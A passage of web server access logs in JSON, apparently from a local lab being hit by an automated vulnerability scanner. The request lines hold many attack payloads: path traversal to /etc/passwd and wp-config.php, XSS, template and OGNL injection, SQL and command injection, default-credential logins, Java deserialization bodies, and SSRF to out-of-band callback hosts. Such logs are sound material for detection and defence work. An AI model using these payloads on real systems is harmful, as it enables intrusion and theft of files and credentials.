HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wan.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.travis.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/repository HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/services HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/health-check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test') or 1=1 -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json/v1.0/29K6BYf9SIkuHKye60OGg87kOXv@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://attacker.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-post.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/tenants HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22username\x22:\x22minioadmin\x22,\x22password\x22:\x22minioadmin\x22},\x22method\x22:\x22Web.Login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /minio/webrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"username=admin&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /htdocs/login/login.lua HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMUser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22bulk\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22:\x22add_remote_schema\x22,\x0D\x0A \x22args\x22:{\x0D\x0A \x22name\x22:\x22test\x22,\x0D\x0A \x22definition\x22:{\x0D\x0A \x22url\x22:\x22https://ca27l3osmpvb3nig07h09sjakyb5qkzuj.oast.me\x22,\x0D\x0A \x22headers\x22:[\x0D\x0A ],\x0D\x0A \x22timeout_seconds\x22:60,\x0D\x0A \x22forward_client_headers\x22:true\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"return=index.php&username=administrator&password=root","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/JMXInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../29K6BZiyhwuI7dKrp8QKlcQwkab.txt&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RestAPI/ImportTechnicians HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/doenterpagevariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /smb.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://ca27l3osmpvb3nig07h0s7prastzj4mca.oast.me%23.salesforce.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /artifactory/ui/repodata?deploy=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm935/index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tcpconfig.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /update.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/EJBInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29K6BZiyhwuI7dKrp8QKlcQwkab.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /assets/_core/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_canteen&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage.action?spaceKey=myproj HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) 